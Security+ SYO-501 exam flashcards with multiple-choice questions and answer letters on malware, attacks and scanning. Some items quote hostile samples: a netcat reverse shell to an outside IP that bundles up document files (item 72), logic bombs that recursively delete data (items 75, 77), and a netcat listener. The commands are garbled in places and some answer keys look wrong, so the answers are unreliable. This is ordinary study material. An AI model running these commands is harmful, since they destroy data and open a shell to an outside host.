SYO-501 Study Guide Flashcards

1
Q

A security administrator wants to implement a log-on script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?
A: ARP -s 192.168.1.1 00-3a-d1-fa-b1-06
B: dig -x@192.168.1.1 mypc.comptia.com
C: nmap -A -T4 192.168.1.1
D: tcpdump -Inv host 192.168.1.1 or either 00:3a:d1:fa:b1:06

A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
An actor downloads and runs a program against a corporate login page. The program imports a list of usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes the actor in this situation?
A: Script kiddie
B: Hactivist
C: Cryptologist
D: Security Auditor
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?
A: Escalation of privilege
B: SQL injection
C: Active Reconnaissance 
D: Proxy server
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed?
A: Non-intrusive
B: Authenticated
C: Credentialed
D: Active
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host?
A: Backdoor
B: Pivoting
C: Persistence
D: Logic Bomb
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q
Which of the following is commonly done as part of a vulnerability scan?
A: Exploiting misconfigured applications
B: Cracking employee passwords
C: Sending phishing emails to employees
D: Identifying unpatched workstations
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform:
A: a gray-box penetration test.
B: a risk analysis.
C: a vulnerability assessment.
D: an external security audit.
E: a red team exercise.
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host?
A: Remote exploit
B: Amplification
C: Sniffing
D: Man-in-the-middle
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Which of the following describes the key difference between vishing and phishing attacks?
A: Phishing is used by attackers to steal a person’s identity.
B: Vishing attacks require some knowledge of the target of attack.
C: Vishing attacks are accomplished using telephony services.
D: Phishing is a category of social engineering attack.

A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?
A: Passive scan
B: Aggressive scan
C: Credentialed scan
D: Intrusive scan
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q
Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured?
A: Embedded web server
B: Spooler
C: Network interface
D: LCD control panel
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q
A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?
A: RAT
B: Worm
C: Ransomware 
D: Bot
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?
A: Competitor
B: Hacktivist
C: Insider
D: Organized crime
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?
A: Pivoting
B: Process affinity
C: Buffer overflow
D: XSS
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Which of the following differentiates a collision attack from a rainbow table attack?
A: A rainbow table attack performs a hash lookup.
B: A rainbow table attack uses the hash as a password.
C: In a collision attack, the hash and the input data are equivalent.
D: In a collision attack, the same input results in different hashes.

A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved? (Select TWO)
A: MITM attack
B: DoS attack
C: DLL injection
D: Buffer overflow
E: Resource exhaustion
A

B&E

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO)
A: Privileged-user certificated were used to scan the host
B: Non-applicable plug ins were selected in the scan policy
C: The incorrect audit file was used
D: The output of the report contains false positives
E: The target host has been compromised

A

B&D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are:
A: Escalating privilege
B: Becoming persistent
C: Fingerprinting
D: Pivoting
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q
A Chief Information Officer (CIO) recently saw on the news that a significant security flaw exists with a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?
A: Penetration test
B: Vulnerability scan
C: Active reconnaissance
D: Patching assessment report
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q
Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?
A: Buffer overflow
B: MITM
C: XSS
D: SQLi
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q
Which of the following uses precomputed hashes to guess passwords?
A: Iptables
B: NAT tables
C: Rainbow tables
D: ARP tables
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence its decisions?
A: The scanner must be able to enumerate the host OS of devices scanner
B: The scanner must be able to footprint the network
C: The scanner must be able to check for open ports with listening services
D: The scanner must be able to audit file system permissions

A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO)
A: Install an additional firewall
B: Implement a redundant email server
C: Block access to personal email on corporate systems
D: Update the X.509 certificates on the corporate email server
E: Update corporate policy to prohibit access to social media websites
F: Review access violation on the file server

A

C&E

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q
A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk?
A: Enable CHAP
B: Disable NTLM
C: Enable Kerebos
D: Disable PAP
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q
A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file?
A: Keylogger 
B: Rootkit
C: Bot
D: RAT
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q
A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?
A: Banner grabbing
B: Port scanning
C: Packet sniffing 
D: Virus scanning
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

A technician is investigating a potentially compromised device with the following symptoms:
-Browser slowness
-Frequent browser crashes
-Hourglass stuck
-New search toolbar
-Increased memory consumption
Which of the following types of malware has infected the system?

A: Man-in-the-browser
B: Spoofer
C: Spyware
D: Adware

A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?
A: Replay
B: Spoofing
C: DNS poisoning
D: Client-side attack
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?
A: Non-intrusive credentialed scan
B: Non-intrusive non-credentialed scan
C: Intrusive credentialed scan
D: Intrusive non-credentialed scan
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q
Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?
A: Black box
B: Gray box
C: Credentialed
D: White box
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q
Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?
A: Competitors
B: Insiders
C: Hacktivists
D: Script kiddies
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q
Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred?
A. Ransomware
B. Keylogger
C. Buffer overflow
D. Rootkit
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO).

A: The firewall is disabled on workstations.
B: SSH is enabled on servers.
C: Browser homepages have not been customized.
D: Default administrator credentials exist on networking hardware.
E: The OS is only set to check for updates once a day.

A

A&D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect?
A: The server will be unable to server clients due to lack of bandwidth
B: the server’s firewall will be unable to effectively filter traffic due to the amount of data transmitted
C: The server will crash when trying to reassemble all the fragmented packets
D: The server will exhaust its memory maintaining half-open connections

A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q
A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic?
A: Data confidentiality breaches
B: VM escape attacks
C: Lack of redundancy
D: Denial of service
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q
A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing?
A: Phishing
B: Shoulder surfing
C: Impersonation
D: Dumpster diving
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q
A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access?
A: Phishing
B: Man-in-the-middle
C: Tailgating
D: Watering hole
E: Shoulder surfing
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue?
A. Botnet
B. Ransomware
C. Polymorphic malware
D. Armored virus
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q
The POODLE attack is an MITM exploit that affects:
A: TLS1.0 with CBC mode cipher
B: SSLv2.0 with CBC mode cipher
C: SSLv3.0 with CBC mode cipher
D: SSLv3.0 with ECB mode cipher
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q
Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine?
A: Ransomware
B: Rootkit
C: Backdoor
D: Keylogger
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?
A: Aggressive scan
B: Passive scan
C: Non-credentialed scan
D: Compliance scan
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

A user receives an email from ISP indicating malicious traffic coming from the user’s home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance
camera system. Which of the following BEST describes what is happening?
A: The camera system is infected with a bot.
B: The camera system is infected with a RAT.
C: The camera system is infected with a Trojan.
D: The camera system is infected with a backdoor.

A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

A network administrator is reviewing the following IDS logs:

[insert photo]

Based on the above information, which of the following types of malware is triggering the IDS?

A: Trojan
B: Bot
C: Logic Bomb
D: Worm

A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q
Hacktivists are commonly motivated by?
A: Curiosity
B: Notoriety
C: Financial Gain
D: Political Cause
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

An organization’s IT department announced plans to update workstation operating systems to the latest version after electing to skip the prior two versions. Which of the following vulnerabilities is the organization seeking to mitigate?
A: Incompatibility issues with currently implemented software
B: Lack of vendor support on the version currently in use
C: Poorly defined security baselines
D: Use of expired certificates on the network

A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q
A security analyst is conducting a web application vulnerability scan against the company website. Which of the following is considered an intrusive scan?
A: Ping Sweep
B: Time-delay port scanning
C: Service identification
D: Cipher suite order
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q
An auditor confirms the risk associated with a Windows specific vulnerability, which was discovered by the company's security tool, does not apply due to the server running a LinuxOS. Which of the following does this BEST describe?
A: Inherent risk
B: Attack vector
C: False positive
D: Remediation
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

Which of the following BEST describes the impact of an unremediated session timeout vulnerability?
A: The credentials of a legitimate user could be intercepted and reused to log in when the legitimate user is offline.
B: An attacker has time to attempt brute-force password cracking.
C: More than one user may be allowed to concurrently connect to the system, and an attacker can use one of those concurrent connections.
D: An attacker could use an existing session that has been initiated by a legitimate user

A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q
A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware's binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment?
A: Trojan
B: Polymorphic worm
C: Logic Bomb
D: Armored Virus
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select TWO)

A. Familiarity 
B. Scarcity 
C. Urgency 
D. Liking
E. Consensus 
F. Authority
A

C&F

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q
A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies the type of penetration testing?
A: Black box
B: White box
C: Gray box
D: Blue teaming
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q
A website form is used to register new students at a university. The form passes the unsanitized values entered by the user and uses them to directly add the student's information to several core systems. Which of the following attacks can be used to gain further access due to this practice?
A: Cross-site request forgeries.
B: XSS attacks
C: MITM attacks
D: SQL Injection
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

During a routine review of firewall log reports a security technician notices multiple successful logins for the admin user during unusual hours the technician contact the network administrator, who confirms the logins were not related to the administrator’s activities. Which of the following is the most likely reason for these logins?
A: Firewall maintenance service windows were scheduled.
B: Default credentials were still in place.
C: The entries in the log were caused by the file Integrity monitoring system.
D: A blue team was conducting a penetration test on a firewall.

A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization are secure. The auditor finds out that one application has been accessed remotely with no legitimate account credentials. After investigating, it seems the application has allowed some user to bypass authentication of that application. Which of the following types of malware allows such a compromise to take place? (Select TWO).

A: RAT

B: Ransomware

C: Worm

D: Trojan

E: Backdoor

A

A&E

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

Which of the following differentiates ARP poising from a MAC spoofing attack?
A: ARP poisoning uses unsolicited ARP replies.
B: ARP poisoning overflows a switch’s CAM table.
C: MAC spoofing uses DCHPOFFER/DHCPACKS packets
D: MAC spoofing can be performed across multiple routers.

A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

Which of the following is a major difference between XSS attacks and remote code exploits?
A: XSS attacks uses machine language, while remote exploits use interpreted language.
B: XSS attacks target servers, while remote code exploits target clients.
C: Remote code exploits aim to escalate attackers’ privileges, while XSS attack aim to gain access only.
D: Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work.

A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

Compared to a non-credentialed scan, which of the following is a unique result of a credentialed scan?
A: Uncommon open ports on the host
B: Outdated software versions on the host
C: Self-signed certificate on the host
D: Fully qualified domain name

A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q
The network team has detected a large amount of traffic between workstations on the network. The traffic as initially very light, but it is increasing exponentially as the day progresses. Which of the following types of malware might be suspected?
A: Backdoor
B: Rootkit
C: Worm
D: Spyware
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q
A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur?
A: Impersonation
B: Credential harvesting
C: Password cracking
D: Lateral movement
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q
An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all the file names were changed to some random names. Which of the following BEST represents what compromised the machine?
A: Ransomware
B: Worm
C: Crypto-malware
D: RAT
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q
A security manager discovers the most recent vulnerability scan report illustrates low-level non-critical findings. Which of the following scanning concepts would BEST report critical threats?
A: Non-credentialed scan
B: Compliance scan
C: Intrusive scan
D: Application scan
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q
A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?
A: Domain hijacking
B: Injection
C: Buffer overflow
D: Privilege escalation
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q
An analyst is part of a team that is investigating a potential breach of sensitive data at a large organization, which serves the financial sector. The organization suspects a breach occurred when proprietary data was disclosed to the public. the team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was the MOST likely to have been utilized to exfiltrate the proprietary data?
A: Keylogger
B: Botnet
C: Crypto-malware
D: Backdoor
E: Ransomware
F: DLP
A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q
Which of the following enables sniffing attacks against a switched network?
A: ARP poisoning
B: IGMP snooping
C: IP spoofing
D: Syn flooding
A

A

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q
A public announcement is made about a newly discovered, rapidly spreading virus. The security team immediately updates and applies all its antivirus signatures. The security manager contacts the antivirus vendor support team to ask why one of the systems was infected. The vendor support team explains that the signature update is not available for this virus yet. Which of the following BEST describes this situation?
A: Race condition
B: Zero day
C: Lack of vendor support
D: Untrained users
A

B

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q
While browsing an external website, a human resources manager opens several links in new browser tabs to review later. After browsing 20 minutes, a full screen message appears in a completely new browser window with a critical error code and a help desk number to call. At the same time, an audio message plays over the laptop speaker, describing a critical error and warning that the IP address of the laptop will be blocked until the critical issue is resolved. The human resources manager is unable to escape out of the error message, and the keyboard is not responsive. After alerting the security team, the human resources manager holds down the power button to turn off the laptop and then powers it back on, which rectifies the issue. Which of the following BEST describes the type of attack the human resources manager is experiencing?
A: Spyware
B: Ransomware
C: Adware
D: Logic bomb
A

C

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

A security analyst is monitoring the network and observes unusual traffic coming from a host on the LAN. Using a network monitoring tool, the analyst observes the following information:
[insert photo]
After ten seconds, some computers shown in the IP Dst field start to exhibit the same behavior and immediately make multiple outbound connection attempts. Based on this observed behavior, which of the following is the MOST likely cause?
A: Users are running port scans on the network.
B: A malicious host is performing a MITM attack.
C: An amplified DDoS attack is in progress.
D: A worm is attacking the network.
E: a race condition is being leveraged.

A

D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (Select THREE)

A: Crypto-malware 
B: Adware
C: Botnet attack 
D: Virus
E: Ransomware 
F: Backdoor
G: DDoS attack
A

A,D,&E

69
Q
A technician wants to perform network enumeration against a subnet in preparation for an upcoming assessment. During the first phase, the technician performs a ping sweep. Which of the following scan types did the technician use?
A. Non-intrusive
B. intrusive
C. Credentialed
D. Passive
A

A

70
Q
Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the windows/Current Version.run registry key?
A. Persistence
B. Pivoting
C. Active reconnaissance
D. Escalation of privilege
A

A

71
Q

Which of the following is an example of resource exhaustion?
A: A penetration tester requests every available IP address from a DHCP server.
B: An SQL injection attack returns confidential data back to the browser.
C: Server CPU utilization peaks at 100% during the reboot process.
D: System requirements for a new software package recommend having 12GB of RAM, but only 8GB are available.

A

A

72
Q

A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the cliff command, comparing the CAWindows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious.

One of the files contains the following commands:
cmd /C %TEMP\nc -c cmd.exe 34.100.43.230 copy .doc > %TEMP%\docfiles.zip copy .xls > %TEMP%\xlsfiles.zip copy *.pdf > %TEMP%\pdffiles.zip

Which of the following types of malware was used?
A: Worm
B: Spyware
C: Logic bomb
D: Backdoor
A

D

73
Q

A security analyst is performing a pass the hash penetration testing. The security analyst has obtained the SAM, Security, and System hives from a compromised system and wants to view password hashes. Given this scenario, which of the following is the first step the security analyst should take?
A: Run a scan on the HKLM\SAM hive in the registry
B: Brute force attack the system using a known username
C: Perform a memory dump of the lsass.exe using task manager
D: Create a snapshot of Active Directory using ntdsutil

A

A

74
Q

Which of the following are considered among the BEST indicators that a received message is a hoax? (Select TWO)
A: Minimal use of uppercase
B: Warnings of monetary loss to the receiver
C: No valid digital signature from a known security organization
D: Claims of possible damage to computer hardware
E: Embedded URL’s

A

B&D

75
Q

A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server:

$members = GetADGroupMemeber -Identity “Domain Admins” -Recursive | Select - ExpandProperty name if ($members -notcontains “JohnDoe”){
Remove-Item -path C:\Database -recurse -force

Which of the following did the security administrator discover?
A: Ransomware
B: Backdoor
C: Logic bomb
D: Trojan
A

C

76
Q

After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below:
c:\Windows\system32>netstat -nab
Active Connections
Pronto | Local Address | Foreign Address | State
TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe]
TCP 0.0.0.0:445 0.0.0.0 [svchost.exe]
TCP 192.168.1.10:5000 10.37.213.20 winserver.exe
UDP 192.168.1.10:1900 . SSDPSVR

Based on the above information, which of the following types of malware was installed on the user's computer?
A: RAT
B: Keylogger
C: Spyware
D: Worm
E: Bot
A

A

77
Q

An information security specialist is reviewing the following output from a Linux server:

user@server:~$ -l 5 /usr/local/bin.backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep –quiet joeuser /etc/passwd the rm -rf / fi

Based on the above information, which of the following types of malware was installed on the server?
A: Logic bomb
B: Trojan
C: Backdoor
D: Ransomware
E: Rootkit
A

A

78
Q

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code:

void foo (char *bar)
{ car random_user_input[12];
stropy (random_user_input, bar);
}
Which of the following vulnerabilities is present?
A: Bad memory pointer
B: Buffer overflow
C: Integer overflow
D: Backdoor
A

B

79
Q

A technician suspects that a system has been compromised. The technician reviews the following log entry:

WARNING - hash mismatch: C:\Window\SysWOW64\user32.dll WARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dll

Based solely on the above information, which of the following types of malware is MOST likely installed on the system?
A: Rootkit
B: Ransomware
C: Trojan
D: Backdoor
A

A

80
Q

A security analyst monitors the syslog server and notices the following:

pinging 10.25.27.31 with 65500 bytes of data Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128

Which of the following attacks is occurring?
A: Memory leak
B: Buffer overflow
C: Null pointer deference
D: Integer overflow
A

B

81
Q

A recent audit contained significant findings for several servers, including:
In the future, which of the following capabilities would enable administrators to detect these issues proactively?
A: Credentialed vulnerability scan
B: Non-credentialed vulnerability scan
C: Automatic file integrity checking
D: Manual file integrity checking

A

A

82
Q

During a penetration test, some servers in the network were found to be using Telnet as a remote connection protocol. Which of the following would mitigate the identified risk?

A: Disable Telnet and deploy SSH.
B: Disable Telnet and deploy SFTP.
C: Disable Telnet and deploy SNMPv3.
D: Disable Telnet and deploy S/MIME.

A

A

83
Q

Emails containing the URL of a popular technology forum were sent from an external source to a research and development company. When users at the company load the page, malware infects their system. Which of the following BEST describes this scenario?
A: The email is intended to spread information that is a hoax.
B: The email is intended to bait users into accessing a watering hole.
C: The email is intended to promote shoulder surfing.
D: The email is intended to disrupt productivity.

A

B

84
Q
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?
A: Buffer overflow
B: End-of-life systems
C: System sprawl
D: Weak configuration
A

C

85
Q
  1. A security analyst observes the following events in the logs of an employee workstation:

1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level.
1/23 1:07:09 1034 The scan is completed. No detections were found.

The security analyst reviews the file system and observes the following:
C:\>dir
C:\Users\user\temp
1/23 1:07:02 oasdfkh.hta
1/23 1:07:02 update.bat
1/23 1:07:02 msg.txt

Given the information provided, which of the following MOST likely occurred on the workstation?
A: Application whitelisting controls blocked an exploit payload from executing.
B: Antivirus software found and quarantined three malware files.
C: Automatic updates were initiated but failed because they had not been approved.
D: The SIEM log aged was not tuned properly and reported a false positive.

A

A

86
Q
2. A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space?
A: Misconfigured devices
B: Logs and events anomalies
C: Authentication issues
D: Unauthorized software
A

D

87
Q
  1. A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output:

usera@host>history

mkdir /local/usr/bin/somedirectory

nc -1 192.168.5.1 -p 9856

ping -c 30 8.8.8.8 -a 600 r

m /etc/dir2/somefile

rm -rm /etc/dir2/

traceroute 8.8.8.8

pakill pid 9487

usera@host>

Given the above output, which of the following commands would have established the questionable socket?

A: traceroute 8.8.8.8
B: ping -1 30 8.8.8.8 -a 600
C: nc -1 192.168.5.1 -p 9856
D: pskill pid 9487

A

C

88
Q
  1. An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?
    A: Firewall; implement an ACL on the interface
    B: Router; place the correct subnet on the interface
    C: Switch; modify the access port to trunk port
    D: Proxy; add the correct transparent interface
A

B

89
Q
  1. A security analyst receives an alert from a WAF with the following payload:

var data = “ ++ “

Which of the following types of attacks is this?

A: Cross-site request forgery
B: Buffer overflow
C: SQL injection
D: JavaScript data insertion
E: Firewall evasion script
A

D

90
Q
6. A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report?
A: Vulnerability scanner
B: Protocol analyzer
C: Network mapper
D: Web inspector
A

A

91
Q
  1. The computer resource center issue smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the managers installed?

A: Download manager
B: Content manager
C: Segmentation manager
D: Application manager

A

D

92
Q
  1. A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install?

A: Vulnerability scanner
B: Network-based IDS
C: Rogue system detection
D: Configuration compliance scanner

A

C

93
Q
  1. A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer?

A: Round-robin
B: Weighted
C: Least connection
D: Locality-based

A

D

94
Q
  1. A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented?
A: Host-based firewall
B: Enterprise patch management system
C: Network-based intrusion prevention system
D: Application blacklisting
E: File integrity checking
A

C

95
Q
  1. Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann’s access and checks the SIEM for any errors. The security analyst reviews the log file from Ann’s system and notices the following output:

2017–08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 ——– RECEIVE

2017–08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 ——– RECEIVE

Which of the following is MOST likely preventing Ann from accessing the application from the desktop?

A: Web application firewall
B: DLP
C: Host-based firewall
D: UTM
E: Network-based firewall
A

C

96
Q
  1. A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console:

